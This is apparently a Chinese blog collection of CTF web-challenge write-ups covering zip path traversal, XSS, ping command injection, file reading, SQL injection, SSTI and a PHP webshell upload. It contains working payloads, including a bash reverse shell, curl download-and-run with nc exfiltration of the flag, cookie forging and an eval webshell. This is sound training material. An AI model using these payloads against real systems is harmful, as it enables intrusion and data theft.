当前位置:   article > 正文

ctf之WEB练习二

ctf web apache
题目名称:从0到1CTFer成长之路-Web文件上传
题目wirteup:
启动题目场景,获得题目靶场,访问网站,发现是一个文件上传漏洞,并且源代码也显示出来。
http://eci-2zead4wngyl8hacgmm4n.cloudeci1.ichunqiu.com/
源代码大概如下分析:
<?php
header("Content-Type:text/html; charset=utf-8");
// 每5分钟会清除一次目录下上传的文件
//会包含文件pclzip.lib.php,感觉这个php里面是有一些针对zip包进行解压等的操作的
require_once('pclzip.lib.php');
//要是没上传文件,就输出上传页面
if(!$_FILES){
echo '省略的HTML'
    show_source(__FILE__);
}else{
    $file = $_FILES['file'];
//限制上传的文件名不为空
    if(!$file){
        exit("请勿上传空文件");
    }
    $name = $file['name'];
    $dir = 'upload/';
//strrchr($name, '.') 
//strrchr() 函数查找字符串在另一个字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符。
//比如上传的文件名为$name=1.php.txt,这里strrchr($name, '.') 执行结果为.txt
//substr(strrchr($name, '.'), 1)
//substr字符串截取,从下标为1开始截取,那就是把点略过,截取后为txt
//通过strtolower函数将所有字符转换为小写,赋值给ext变量
    $ext = strtolower(substr(strrchr($name, '.'), 1));
//如果我们上传的文件名为1.txt,那么path变量就为upload/1.txt
    $path = $dir.$name;
//检查是否为目录
    function check_dir($dir){
        $handle = opendir($dir);
        while(($f = readdir($handle)) !== false){
            if(!in_array($f, array('.', '..'))){
                if(is_dir($dir.$f)){
                    check_dir($dir.$f.'/');
                 }else{
                    $ext = strtolower(substr(strrchr($f, '.'), 1));
                    if(!in_array($ext, array('jpg', 'gif', 'png'))){
                        unlink($dir.$f);
                    }
                }
            }
        }
    }
//创建目录    
    if(!is_dir($dir)){
        mkdir($dir);
    }
//将目录名拼接一个随机数,读到这里,基本上就知道需要路径穿越了,因为我们不知道随机数值,所以就算绕过上传,解析也是一大关
    $temp_dir = $dir.md5(time(). rand(1000,9999));
    if(!is_dir($temp_dir)){
        mkdir($temp_dir);
    }
//首先进行后缀的校验,把刚刚拿到的,最后一个.后面的字符串和这里的zip、jpg、gif、png进行对比校验
    if(in_array($ext, array('zip', 'jpg', 'gif', 'png'))){   //使用白名单校验,只允许zip、jip、gif、png 上传
        if($ext == 'zip'){  //如果使用zip 上传,下面就是zip解压流程规则
//使用PclZip进行解压缩        
            $archive = new PclZip($file['tmp_name']);
//遍历解压缩后的每个目录            
            foreach($archive->listContent() as $value){
                $filename = $value["filename"];
//一段较为简单的正则,就是匹配每个文件结尾的位置,是否是.php  ,如果是则退出解压程序            
                if(preg_match('/\.php$/', $filename)){
                     exit("压缩包内不允许含有php文件!");
                 }
            }
            if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) {
                check_dir($dir);
                   exit("解压失败");
            }
            check_dir($dir);
            exit('上传成功!');
        }else{
            move_uploaded_file($file['tmp_name'], $temp_dir.'/'.$file['name']);
            check_dir($dir);
            exit('上传成功!');
        }
    }else{
        exit('仅允许上传zip、jpg、gif、png文件!');
    }
}
大概代码是需要将php文件先压缩成zip文件压缩包,然后绕过路经检测,通过路径穿越将文件放到指定目录,然后访问上传的文件名
如果将解压出的文件穿越到非upload目录,check__dir方法就无法删除该文件。zip压缩包被解压到/upload/随机md5/目录下,所以需要穿越两个目录,由于我们上传的路径目录是upload/随机值/上传的文件,需要穿越两层,直到根目录下,一层随机目录,一层upload
所以需要文件名为…/…/file.php,由于需要构造解析,利用apache的解析漏洞,如果从右开始,直到哪个能识别就解析哪个,构造最终文件名为../../hhhh.php.xxx,这个文件名长度为18位
windows操作系统下,右键创建文件,文件名随便写一个18位的(跟刚刚的文件名位数一样),这里是把后缀涵盖的,例如:123456789012345678
然后我用的WinRar,右键添加到zip
接下来就开始用010 Editor进行zip文件的编辑,我们分别将char frFileName[18]修改为hhhh.php.xxx和char deFileName[18]修改为../../hhhh.php.xxx
,然后保存压缩文件
对压缩文件进行上传成功后,会进行自动解压缩
然后访问以下路径,即可获得flag
http://eci-2zead4wngyl8hacgmm4n.cloudeci1.ichunqiu.com/hhhh.php.xxx
最终flag:
n1book{ThisIsUpLoadToPicfl4g}
题目名称:从01CTFer成长之路-XSS闯关
题目wirtup:
启动题目场景,获得题目靶场,访问网站,发现是一个通关的XSS游戏获取flag
  1. 第一关,输入常规的XSS poc:
  2. <img
  3. src=x onerror=alert(0)> 即可进入下一关
  1. http://eci-2ze4s8hmmy8zzvishpc5.cloudeci1.ichunqiu.com/level1?username=<img
  2. src=x onerror=alert(0)>
第二关,输入测试<xss>poc,查看源代码,发现没有过滤<和>,然后对其进行闭合标签即可
这里通过输入';alert(0);//,即可进入下一关
http://eci-2ze4s8hmmy8zzvishpc5.cloudeci1.ichunqiu.com/level2?username=12';alert(0);//
第三关,输入上一关的poc: ';alert(0);//  发现单引号被转义成/'
这里通过再次输入一个单引号,即可绕过一个单引号的转义,最终poc:12'';alert(0);//  提交,即可进入下一关
http://eci-2ze4s8hmmy8zzvishpc5.cloudeci1.ichunqiu.com/level3?username=12'';alert(0);//
第4关,查看源代码发现有一个自动跳转的变量jumpUrl
代码中接收jumpUrl作为跳转url,伪链接javascript:alert(1),浏览器会把javascript后面的那一段内容当做代码,直接在当前页面执行,即可进入下一关。
http://eci-2ze4s8hmmy8zzvishpc5.cloudeci1.ichunqiu.com/level4?jumpUrl=javascript:alert(0)
第五关,表单中直接输入一个测试数字,提交
发现现实错误
查看源代码,发现有JS 2条IF判断条件限制着。

 限制1:

  1. if(getQueryVariable('autosubmit') !== false){
  1. 绕过限制:

autosubmit=1

限制2

  1. autoForm.action = (getQueryVariable('action') == false) ? location.href : getQueryVariable('action');
  1. 绕过限制:
  1. action=javascript:alert(0)

同样是传值,只不过是传我们的注入语句,提交完整payload:/level5?autosubmit=1&action=javascript:alert(0)

即可进入下一关。

http://eci-2ze4s8hmmy8zzvishpc5.cloudeci1.ichunqiu.com/level5?autosubmit=1&action=javascript:alert(0)
输一个一个测试<xss>发现<和>已经被转义了
查看源代码,发现该关题目使用的AngularJS
点击https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js,发现AngularJS版本为1.4.6
 也可以通过chrome的Wapplayzer插件进行查看
我们的Angular版本是1.4.6,低于1.6版本,那么存在沙箱,利用逃逸沙箱POC:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
访问上面的沙箱poc,即可进入下一关。
下一关显示了flag的内容
最终flag:
n1book{xss_is_so_interesting}
题目名称:从0到1CTFer成长之路-死亡之ping

题目内容:

路由器管理台经常存在的网络ping测试,开发者常常会禁用大量的恶意字符串,试试看如何绕过呢?

题目writeup:
启动题目场景,获得靶场,访问网站,并输入测试ping  127.0.0.1,发现可以成功,但是没有回显到页面上。
http://eci-2zed552151f9re6faxx2.cloudeci1.ichunqiu.com/
该题目存在一些黑名单过滤的,这里输入一个测试符号&,提交,显示ip包含恶意字符。
这里通过bupsuit的intruder进行fuzz 常用的键盘符号。
常用的fuzz 键盘符号:
~
`
#
#!
|
'
"
$
.
!
%
@
°
*
(
((
&
[
[[
{
=
+
-
_
\
/
:
;
<
>
,
?
^
<>
&&
||
fuzz出这些符号:+  /  =  <      >    ,?  <>   没有被过滤
通过%0a,表示换行,并能连接新的一条命令进行执行(不能在浏览器中直接提交%0a,否则会自动转换成url编码提交会报错),因此建议在 burp中抓包后修改提交请求.
首先在测试%0als,是可以执行成功,证明%0a可以绕过执行
ip=127.0.0.1%0als
这里直接测试下bash反弹,发现有特殊的字符(如&已经被拦截了)是反弹不成功的
ip=127.0.0.1%0abash -i >& /dev/tcp/36.xx.xx.223:8080 0>&1
在公网主机vps上编写flag.sh脚本内容如下:
ls
cat  /FLAG | nc 192.168.1.5  2333
并且在公网主机VPS上使用python搭建http服务,端口为80(一定是80端口),如果使用其他端口,则使用curl下载的时候需要用到:端口号访问, :符号则在被拦截范围中。
python -m SimpleHTTPServer  80
使用curl命令从vps 主机下载flag.sh到靶机系统中的tmp目录下,一般tmp目录具有可读写权限。
ip=127.0.0.1%0acurl  36.xx.xx.223/flag.sh > /tmp/flag.sh 
使用chmod命令远程修改已下载的flag.sh文件的可读写执行权限
ip=127.0.0.1%0achmod 777 /tmp/flag.sh
通过sh命令远程执行靶机中的flag.sh脚本
ip=127.0.0.1%0ash  /tmp/flag.sh 
vps本地监听,且nc反弹出来靶机中的输出命令信息的内容包含了flag
最终flag:
n1book{6fa82809179d7f19c67259aa285a7729}
题目名称:从0到1CTFer成长之路--afr_3
题目witeup:
访问靶机网站,这里输入测试 test内容,发现页面回显也显示test
http://eci-2ze6rqbmu4jlf86hemsa.cloudeci1.ichunqiu.com/
猜测是存在ssti注入,这里输入测试{{7+7}},页面显示+被过滤,也没相加执行,显然猜测是错误的。
继续访问article超链接,看起来像参数存在文件包含或者sql注入漏洞
http://eci-2ze6rqbmu4jlf86hemsa.cloudeci1.ichunqiu.com/article?name=article
这里通过bupsuit进行fuzz测试常用的文件包含,可以看到在../../etc/passwd路径读取系统的passwd
猜测flag在系统的根目录下,于是然后尝试读取一下根目录下的flag,但是提示没有权限
tps:
常用的环境变量配置读取:
/proc/sched_debug # 提供cpu上正在运行的进程信息,可以获得进程的pid号,可以配合后面需要pid的利用
/proc/mounts # 挂载的文件系统列表
/proc/net/arp # arp表,可以获得内网其他机器的地址
/proc/net/route # 路由表信息
/proc/net/tcp and /proc/net/udp # 活动连接的信息
/proc/net/fib_trie # 路由缓存
/proc/version  # 内核版本
/proc/[PID]/cmdline # 可能包含有用的路径信息
/proc/[PID]/environ #  程序运行的环境变量信息,可以用来包含getshell
/proc/[PID]/cwd     # 当前进程的工作目录
/proc/[PID]/fd/[#] # 访问file descriptors,某写情况可以读取到进程正在使用的文件,比如access.log
尝试读取系统当前运行那些程序并且查看进程,这里fuzz  /proc/self/cmdline读取系统进程,最终遍历到目录../../../proc/self/cmdline读取,成功执行并回显:python server.py,说明该题应该是一个python的环境
又根据以往经验尝试读取../../../app/server.py 和../../../server.py都不能读取
尝试读取系统环境,这里fuzz  /proc/self/environ 读取系统环境变量,最终遍历到目录../../../proc/self/environ读取,成功执行并回显出server.py的路径为/home/sssssserver和flag信息
提交flag发现出错,证明不是真正的flag
于是读取/home/sssssserver/server.py,成功读取到其源码
../../../home/sssssserver/server.py
回显出来的源码通过html decode 后得到server.py:
import os
from flask import ( Flask, render_template, request, url_for, redirect, session, render_template_string )
from flask_session import Session
app = Flask(__name__)
execfile('flag.py')
execfile('key.py')
FLAG = flag
app.secret_key = key
@app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    n1code = request.form.get("n1code") or None
    if n1code is not None:
        n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")
    if "n1code" not in session or session['n1code'] is None:
        session['n1code'] = n1code
    template = None
    if session['n1code'] is not None:
        template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
        session['n1code'] = None
    return render_template_string(template)
@app.route("/", methods=["GET"])
def index():
    return render_template("main.html")
@app.route('/article', methods=['GET'])
def article():
    error = 0
    if 'name' in request.args:
        page = request.args.get('name')
    else:
        page = 'article'
    if page.find('flag')>=0:
        page = 'notallowed.txt'
    try:
        template = open('/home/nu11111111l/articles/{}'.format(page)).read()
    except Exception as e:
        template = e
    return render_template('article.html', template=template)
if __name__ == "__main__":
    app.run(host='0.0.0.0',port=80, debug=False)
对其源码进行审计发现,flag在flag.py中。还发现确实存在模板注入,虽然下面这语句存在过滤
if n1code is not None:
        n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")
同时又发现flask函数的中存在key.py,而appkey又在key.py中,但是此处任意文件读取漏洞被过滤了关键词flag
下面语句存在ssti模板注入,模板渲染的内容就是n1code,但是其实n1code的来源可以是session,前提是可以伪造flask的cookie。
    if session['n1code'] is not None:
        template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
于是读取key.py
../../../proc/self/cwd/key.py 
成功读取到appkey:
key = 'Drmhze6EPcv0fN_81Bj-nA'
使用 flask-session-cookie-manager 进行生成伪造cookie:
$ git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager
$ python3 setup.py install
下面通过 flask_session_cookie_manager3.py直接生成加密的cookie:
python3  flask_session_cookie_manager3.py   encode -s "Drmhze6EPcv0fN_81Bj-nA" -t  "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"
生成的加密的cookie值:
.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.YQ6_6A.Uv6wMG2nUKf-4u_HURW3HRKGMp8
通过伪造cookie,即可获得flag
最终flag:
n1book{afr_3_solved}
题目名称:从0到1 CTFer成长之路--afr_2
题目writeup:
打开靶机网站,发现是一张图片
查看源代码,发现有图片路径
访问图片路径的根目录,可以看到,看起来像目录遍历
http://eci-2ze39wd1b4km7p6s56t6.cloudeci1.ichunqiu.com/img/
或者通过御剑目录扫描工具,也可以扫描到img目录
尝试在img 目录后加上../,即可返回到上层目录,并可以遍历到flag文件
下载flag文件,可以看到包含了flag内容
最终flag:
n1book{afr_2_solved}
题目名称:从0到1 CTFer成长之路--afr_1
题目writeup:
访问靶机网站,发现输入的参数?p=hello,在页面中显示hello world,靶机路径出现这样的参数?p=测可能存在任意文件包含漏洞
尝试任意文件包含读取/etc/passwd,发现没有显示出来,猜测可能被过滤了
http://eci-2ze8zoog6qcqj933081i.cloudeci1.ichunqiu.com/?p=../../../etc/passwd
尝试任意文件包含读取flag.php,页面还是显示空白,也有可能被过滤
http://eci-2ze8zoog6qcqj933081i.cloudeci1.ichunqiu.com/?p=php://filter/read=convert.base64-encode/resource=flag.php
尝试任意文件包含读取flag,页面有显示,但是并没有显示出flag
http://eci-2ze8zoog6qcqj933081i.cloudeci1.ichunqiu.com/?p=falg
联想到php中可以是用php://fiter读取flag,可以正常读取出内容,且内容是base64加密的(但是读取 flag.php的时候显示空白,理论上是可以读取,猜测这里可能题目后面的参数变量会自动加上.php)
http://eci-2ze8zoog6qcqj933081i.cloudeci1.ichunqiu.com/?p=php://filter/read=convert.base64-encode/resource=flag
读取出来的内容为:PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9
通过在线base64解密网站对其进行解密,发现是一段php代码,代码注释中就包含了flag内容
最终flag:
n1book{afr_1_solved}
题目名称:从0到1 CTFer成长之路--SQL注入-2
题目writeup:
打开靶机题目网站,发现有2个连接
其中lonin.php连接是一个登陆页面
另外一个user.php,发现没任何内容
方法一:
登陆窗口处,猜测账号文本框中可能存在注入,下面尝试测试是否存在注入
post:
name=admin'&pass=123
发现页面报错,存在SQL注入
测试SQL语句的闭合符号#,这里#通过URL编码为%23
name=admin'%23&pass=123
发现页面显示正常,说明#是该SQL语句的闭合符号
测试SQL注入存在的字段数
name=admin'order by 3%23&pass=123  #先测试3个字段,页面显示正常
name=admin'order by 4%23&pass=123         #再测试4个字段,页面显示错误
那么SQL注入中存在3个字段数
通过union selcet联合查询语句查询字段回显位置
name=admin'union select 1,2,3%23&pass=123
发现页面报错,可能union select语句被过滤导致的错误
将selcet 关键字修改为大写的SELECT,提交,发现页面正常显示,说明select大写可以绕过过滤
name=admin'union SELECT 1,2,3%23&pass=123
既然联合查询语句无法进行注入,这里尝试通过updatexml报错函数进行查询,下面报错查询出数据库的版本
name=admin'and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)%23&pass=123
报错查询出数据库的版本为:5.5.64-MariaDB-1ubuntu0.14.04.1
报错查询出用户名
name=admin' and updatexml(1,concat(0x7e,(select user()) ,0x7e),1)%23&pass=123
用户名:root@localhost~
报错查询出当前数据库名
name=admin'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)%23&pass=123
数据库名为:note
报错查询出当前数据库note的表名
name=admin'and  updatexml(1,concat(0x7e,(SELECT(group_concat(table_name))from  information_schema.tables where table_schema=database())),1)%23&pass=123
爆出表名:fl4g,users
爆出查询出flag表名的字段名
name=admin'and  updatexml(1,concat(0x7e,  (SELECT(group_concat(column_name))from  information_schema.columns  where table_name='fl4g')),1)%23&pass=123
字段名:flag
报错查询出flag字段的内容
name=admin'and     updatexml(1,concat(0x7e,(SELECT(flag)from fl4g)),1)%23&pass=123
方法二:
这里通过sqlmap进行注入,先输入登录用户名和密码,然后通过bupsuit抓包,保存为data.txt 
data.txt:
POST http://eci-2ze6rqbmu4jlnm27n4ea.cloudeci1.ichunqiu.com/login.php HTTP/1.1
Host: eci-2ze6rqbmu4jlnm27n4ea.cloudeci1.ichunqiu.com
Connection: keep-alive
Content-Length: 18
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://eci-2ze6rqbmu4jlnm27n4ea.cloudeci1.ichunqiu.com
Referer: http://eci-2ze6rqbmu4jlnm27n4ea.cloudeci1.ichunqiu.com/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; UM_distinctid=17b2110c14b348-029ed0a4395d2d-6373264-144000-17b2110c14c5c3; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1628347352; ci_session=d301e818ba1f28f834072b3fa9b2502add07fee6; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1628391371; __jsluid_h=977e36203f386ae8a9f4be9791a4a1fe; PHPSESSID=3o3l3jdhc6ftjdbc9ga601bo14
name=admin&pass=12
通过sqlmap探测网站是否存在注入
python sqlmap.py  -r   data.txt
发现当前靶机网站存在布尔和时间盲注注入
sqlmap爆出当前数据库名
python sqlmap.py  -r   data.txt  - - current - db
爆出的数据库名:note
sqlmap列出note数据库所有的表名
python sqlmap.py  -r   data.txt    - D note - - tables
爆出表名:fl4g,users
sqlmap 列出flag表名的所有列名
python sqlmap.py  -r   data.txt    - D note - T fl4g - - columns
爆出列名:flag
sqlmap 打印输出flag列名字段值的数据
python sqlmap.py  -r   data.txt    - D note - T fl4g - C flag - - dump
最终  flag:
n1book{login_sqli_is_nice}
题目名称:从0到1 CTFer成长之路--SQL注入-1
题目writeup:
访问网站靶机,页面可以正常显示一段内容
http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1
猜测id变量存在sql 注入,这里加入单引号,发现页面和正常页面不一样,说明是存在注入的
http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1'
通过#结束注入语句闭合,发现页面显示正常,这里#在浏览器中以url编码输入。
字段查询
使用order by 语句测试字段3不报错,4报错,证明有3个字段
http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1' order by 3%23
  1. 字段回显查询
  2. 发现在2,3位置有回显,这里id=1要变成-1,因为1的时候,只把查到的第一条显示出来,因此需要输入-1,显示回显全部。
http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,2,3%23
数据库查询
联合查询出数据库名为note
http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,database(),3%23
表名查询
查询出note数据库的表名为:fl4g和notes
http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=-1' union  select  1,group_concat(table_name),3  from  information_schema.tables where  table_schema='note' %23
字段查询
查询出f14g表的字段名为fllllag
http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=-1'  union select 1,group_concat(column_name),3  from  information_schema.columns  where table_name='fl4g' %23
查询字段内容
查询出fllllag字段的内容为: n1book{union_select_is_so_cool}
http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=-1'union select 1,group_concat(fllllag),3  from fl4g %23
  1. 方法二:
sqlmap方法:

获取注入点

sqlmap  -u  "http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1"

获取数据库名,发现存在note数据库名

sqlmap  -u  "http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1" --dbs

3.获取news数据库名中的表名为fl4g和notes表名

sqlmap  -u  "http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1"  --tables  -D note

4.获取secret_talbes表中的字段,得到fllll4g字段

sqlmap  -u  "http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1" -D note  -T fl4g --columns

5.获取字段fl4g内容,得到flag

sqlmap -u  http://111.200.241.244:53198   --data "search=1"   -D note  -T fl4g -C "fllllag"  --dump
最终flag:
n1book{union_select_is_so_cool}
题目名称:从0到1 CTFer成长之路--粗心的小李
题目writeup:
访问靶场网站,页面内容中传递出该题目和git泄露有关
http://eci-2ze687nrysk8eas2z6vo.cloudeci1.ichunqiu.com/
使用GitHack.py进行扫描,并获得index.html
http://eci-2ze687nrysk8eas2z6vo.cloudeci1.ichunqiu.com/.git/
python  GitHack.py  
打开index.html,页面内容中包含了flag
最终flag:
n1book{git_looks_s0_easyfun}
题目名称:从0到1 CTFer成长之路--常见的搜集

题目内容:一共3部分flag

题目writeup:
访问靶机网站,页面内容显示了关键内容为“敏感文件”那么应该与文件目录有关了。并且根据题目内容描述, flag是三部分组成的。
http://eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com/
这里通过dirsearch进行目录扫描
python3  dirsearch.py  -u http://eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com/
访问robots.txt路径,得到flag1的内容,为flag第一部分。
flag1的内容: flag1:n1book{info_1
访问路径index.php~ ,得到flag2的内容,为flag第二部分
http://eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com/index.php~
flag2的内容:flag2:s_v3ry_im
访问路径.index.php.swp ,得到flag3的内容,为flag第三部分
flag3的内容:flag3:p0rtant_hack}
三部分flag组合一起,最终flag:
n1book{info_1s_v3ry_imp0rtant_hack}
题目名称:ics-07
题目描述:工控云管理系统项目管理页面解析漏洞
题目writeup:
启动题目场景,获得靶机网站,访问网站如下
http://111.200.241.244:50888/
  1. 根据题目描述,点击业务管理,在页面中发现有vier-soue超链接,点击链接进入发现有三块PHP源代码。
  2. http://111.200.241.244:50888/index.php?page=flag.php
  1. 主要代码分析如下
  2.  <?php
  3.     session_start();
  4.     if (!isset($_GET[page])) {
  5.       show_source(__FILE__);
  6.       die();
  7.     }
  8.     if (isset($_GET[page]) && $_GET[page] != 'index.php') {
  9.       include('flag.php');
  10.     }else {
  11.       header('Location: ?page=flag.php');
  12.     } //第一块PHP代码分析:参数 page 存在 且 参数page不等于index.php.才包含flag.php,那么参数?page=flag.php就会进行文件包含
  13.     ?>
  14.     <?php
  15.      if ($_SESSION['admin']) { //如果session["admin"]为True
  16.        $con = $_POST['con']; //con参数变量以 post提交
  17.        $file = $_POST['file']; //file参数变量以 post提交
  18.        $filename = "backup/".$file; //目录为假目录,传入file时,文件名后加上一个.
  19.        if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){ \
  20. //$filename正则过滤匹配规则为:过滤了.文件以及.php或者php3、php4、php5、php5、pht、phtml等文件,可通过上传文件名如为sell.php\.或者shell.php\1.php\.绕过
  21.           die("Bad file extension");
  22.        }else{
  23.             chdir('uploaded'); //这里切换了路径,真实的路径在 uploaded下
  24.            $f = fopen($filename, 'w'); //上传以$filename文件名
  25.            fwrite($f, $con); //$con为写入的文件的内容
  26.            fclose($f);
  27.        }
  28.      }
  29. // 第二块php代码分析:如果$_SESSION['admin'] = True,那么POST提交con和file两个参数,且将$con 的内容写到$file中,并对$filename进行正则判断,如果判断正确文件会被上传到uploaded/backup目录下。
  30.      ?>
  31.     <?php
  32.       if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1=== '9') {
  33.         include 'config.php';
  34.         $id = mysql_real_escape_string($_GET[id]);
  35.         $sql="select * from cetc007.user where id='$id'";
  36.         $result = mysql_query($sql);
  37.         $result = mysql_fetch_object($result);
  38.       } else {
  39.         $result = False;
  40.         die();
  41.       }
  42.       if(!$result)die("<br >something wae wrong ! <br>");
  43.       if($result){
  44.         echo "id: ".$result->id."</br>";
  45.         echo "name:".$result->user."</br>";
  46.         $_SESSION['admin'= True;
  47.       }
  48.      ?>
  49. /*
  50. 第三块代码分析:
  51. 首先使$_SESSION['admin'] = True,需要获取一个id参数, 并且id不为1,且最后一位等于9
  52. floatval()用于获取变量的浮点数值,不能用于数组或对象,这里存在弱类型比较,floatval()后的值为浮点型且不完全等于1
  53. substr要求最后一位是9,那么只要传入id=1+任意字符+9即可绕过
  54. */
  55. 首先我们要得到admin的session的条件,满足以下2个条件:
  56. 1.page为flag.php满足第一块php代码
  57. 2.使用id=1-9来绕过第三块PHP代码过滤
  58. 构造payload:?page=flag.php&id=1-9http://111.200.241.244:50888/index.php?page=flag.php&id=1-9
  59. 需要对if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename))进行绕过,正则的话是判断.之后的字符,因此我们可以利用/.的方式绕过,这个方式的意思是在文件名目录下在加个空目录,相当于没加,因此达到绕过正则的目的,如shell.php/.可绕过。
  60. 或者双文件名绕过,如c.php/b.php/..  也就是访问b.php的父目录,也就是 c.php ,其中 .. 代表当前目录的父目录 , .代表当前目录
  61. 我们要写入一句话木马,以post方式传文件,post变量file为文件名,con为文件内容,且传入的文件名为上文中2种之一的绕过文件方法。
  62. 然后上传路径原本在根目录下的/backup/目录下面,由于加了个chdir()函数,因此将根目录后面加上了/uploaded/目录,然后在跟/backup/目录
  63. 最后的上传目录为:
  64. /uploaded/backup/
  65. 构造payload:
  66. con=<?php @eval($_POST[bk]) ?>&file=shell.php/.
  67. 或者
  68. con=<?php @eval($_POST[bk]) ?>&file=c.php/b.php/..
  1. http://111.200.241.244:50888/index.php?page=flag.php&id=1-9post: con=<?php @eval($_POST[bk]) ?>&file=shell.php/.
  2. 由于chdir(‘uploaded’)改变目录为uploaded,又加上backup/shell.php拼接,所以目录为最终的上传目录为uploaded/backup/shell.php
  3. http://111.200.241.244:50888/uploaded/backup/
  4. 通过蚁剑连接一句话,并对进行flag查找
  5. http://111.200.241.244:50888/uploaded/backup/shell.php
  6. 最终flag:
  7. cyberpeace{2a8cb8444abeb5af640714b9a0e3f9b7}
  8. 题目名称:Confusion1
  9. 题目描述:某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器)
  10. 题目writeup:
  11. 启动题目场景,获得靶机网站,访问网站,页面显示了一张图片,蛇缠住了大象,猜测此系统使用了php+python(php的标志是大象,Python的标志是蛇)
  12. http://111.200.241.244:63580/
  13. 进入注册和登录链接,均都显示404页面报错
  14. http://111.200.241.244:63580/login.php
  15. http://111.200.241.244:63580/register.php
  16. 分别对注册和登录页面源码查看,发现源码注释中都包含了flag的位置
  17. view-source:http://111.200.241.244:63580/register.php
  18. view-source:http://111.200.241.244:63580/login.php
  19. 猜测本题存在Python SSTI漏洞,验证一下,在url后面添加{{2+2}},回车http://111.200.241.244:63580/login.php/{{2+2}},
  20. 界面返回2,我们输入的1+1被执行了,说明服务器执行了{{}}里面这一段代码,存在SSTI漏洞
  21. 这里猜测使用的是 Python 的 Flask 框架( Flask 使用 Jinja2 作为模板引擎 ) ,所以本题的思路就是利用SSTI读取flag文件。
  22. 我们尝试使用经典payload直接读取flag:
  23. 发现页面显示“nope,find another way"说明系统进行了过滤
  24. http://111.200.241.244:63580/login.php/''.__class__.__mro__[2].__subclasses__()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt').read()
  25. 尝试{{url_for.__globals__}}
  26. http://111.200.241.244:63580/login.php/%7B%7Burl_for.__globals__%7D%7D
  27. 页面显示“DO NOT JIAOSHI,YOU CAN NOT USE IT!"应该也被过滤了。
  28. 尝试{{config}}
  29. 页面显示了request方法可用
  30. http://111.200.241.244:63580/login.php/%7B%7Bconfig%7D%7D
  31. 经过尝试,发现系统过滤了class、 subclasses、 read等关键方法,但是并未过滤request方法:
  32. request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) " ,所以我们可以利用request.args绕过输入黑名单,进行沙箱逃逸。
  33. {{''[request.args.a][request.args.b][2][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__
  34. 沙箱逃逸,就是在给我们的一个代码执行环境下(Oj或使用socat生成的交互式终端),脱离种种过滤和限制,最终成功拿到shell权限的过程。其实就是闯过重重黑名单,最终拿到系统命令执行权限的过程。
  35. payload如下:
  36. {{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read
